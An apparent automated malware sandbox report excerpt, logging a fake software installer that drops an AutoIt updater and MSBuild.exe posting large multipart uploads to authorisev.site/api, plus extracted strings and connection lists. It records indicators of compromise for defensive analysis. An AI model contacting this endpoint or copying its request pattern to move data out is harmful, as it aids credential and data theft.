    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20432
    Host: authorisev.site
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1233
    Host: authorisev.site
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 563570
    Host: authorisev.site
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 77
    Host: authorisev.site
Source: unknown TCP traffic detected without corresponding DNS query: 95.101.111.144
Source: unknown TCP traffic detected without corresponding DNS query: 95.101.111.137
Source: unknown TCP traffic detected without corresponding DNS query: 95.101.111.168
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9D935 InternetReadFile,SetEvent,GetLastError,SetEvent, 35_2_00B9D935
Source: global traffic DNS traffic detected: DNS query: authorisev.site
Source: unknown HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: authorisev.site
Source: global traffic HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Fri, 01 Nov 2024 09:50:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IjjQOQjUQOVK4cOVh2WZh0ToapHd4SyCVl2Tn8KkiQQ96CptCjAlAN7gf5OYvVe4t8qwZbXNwBrVj6rzo5QibK4DyKcXEonuXjIKHOINsGdQT9Ymj2SzkCECE%2F41MpMHtSg%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8dbafbc149e26c1c-DFW
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe String found in binary or memory: http://ccsca2021.crl.certum.pl/ccsca2021.crl0s
Source: file.exe String found in binary or memory: http://ccsca2021.ocsp-certum.com05
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: file.exe String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: file.exe String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: is-7LJOT.tmp.3.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: is-7LJOT.tmp.3.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: is-7LJOT.tmp.3.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: is-7LJOT.tmp.3.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cscasha2.ocsp-ce
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: http://cscasha2.ocsp-certum.com04
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://ocsp.entrust.net03
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.us
Source: is-7LJOT.tmp.3.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: is-7LJOT.tmp.3.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: is-7LJOT.tmp.3.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://repository.certum
Source: file.exe String found in binary or memory: http://repository.certum.pl/ccsca2021.cer0
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: http://repository.certum.pl/cscasha2.cer0
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: file.exe String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: file.exe String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0A
Source: is-7LJOT.tmp.3.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: is-7LJOT.tmp.3.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: http://subca.ocsp-certum.com01
Source: file.exe String found in binary or memory: http://subca.ocsp-certum.com02
Source: file.exe String found in binary or memory: http://subca.ocsp-certum.com05
Source: file.exe String found in binary or memory: http://vovsoft.com
Source: file.exe String found in binary or memory: http://vovsoft.com/
Source: file.exe String found in binary or memory: http://vovsoft.com/blog/how-to-activate-using-license-key/openU
Source: file.exe String found in binary or memory: http://vovsoft.com/blog/how-to-uninstall-vovsoft-software/openU
Source: file.exe String found in binary or memory: http://vovsoft.com/help/
Source: file.exe String found in binary or memory: http://vovsoft.com/openU
Source: file.exe String found in binary or memory: http://vovsoft.comopenS
Source: file.exe String found in binary or memory: http://vovsoft.comopenU
Source: Updater.exe, 0000001C.00000000.1715511029.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmp, is-7LJOT.tmp.3.dr String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: http://www.certum.pl/CPS0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://www.entrust.net/rpa03
Source: file.exe String found in binary or memory: http://www.indyproject.org/
Source: MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://authorisev.site/
Source: MSBuild.exe, 00000024.00000002.2348303261.00000000012F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://authorisev.site//
Source: MSBuild.exe, 00000024.00000002.2348303261.00000000012DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://authorisev.site/0
Source: MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://authorisev.site/2U
Source: MSBuild.exe, 00000024.00000002.2348303261.00000000012CF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://authorisev.site/api
Source: MSBuild.exe, 00000024.00000002.2348303261.00000000012F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://authorisev.site/mOW
Source: MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000024.00000002.2348303261.00000000012F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://authorisev.site/pi
Source: MSBuild.exe, 00000024.00000002.2348303261.000000000124D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://authorisev.site:443/api
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: https://jrsoftware.org/
Source: file.exe String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: https://jrsoftware.org0
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: https://sectigo.com/CPS0D
Source: file.exe String found in binary or memory: https://vovsoft.com/blog/credits-and-acknowledgements/open
Source: file.exe String found in binary or memory: https://vovsoft.com/translation/
Source: file.exe String found in binary or memory: https://vovsoft.com/translation/openU
Source: is-7LJOT.tmp.3.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: https://www.certum.pl/CPS0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: https://www.entrust.net/rpa0
Source: is-7LJOT.tmp.3.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: is-7LJOT.tmp.3.dr String found in binary or memory: https://www.globalsign.com/repository/06
Source: file.exe, 00000000.00000003.1677553862.000000007F86B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676905528.0000000003260000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.1678965208.0000000000E91000.00000020.00000001.01000000.00000004.sdmp, file.tmp, 00000003.00000000.1685727842.000000000029D000.00000020.00000001.01000000.00000009.sdmp, file.tmp.0.dr, file.tmp.2.dr String found in binary or memory: https://www.innosetup.com/
Source: file.exe, 00000000.00000003.1677553862.000000007F86B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676905528.0000000003260000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.1678965208.0000000000E91000.00000020.00000001.01000000.00000004.sdmp, file.tmp, 00000003.00000000.1685727842.000000000029D000.00000020.00000001.01000000.00000009.sdmp, file.tmp.0.dr, file.tmp.2.dr String found in binary or memory: https://www.remobjects.com/ps
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
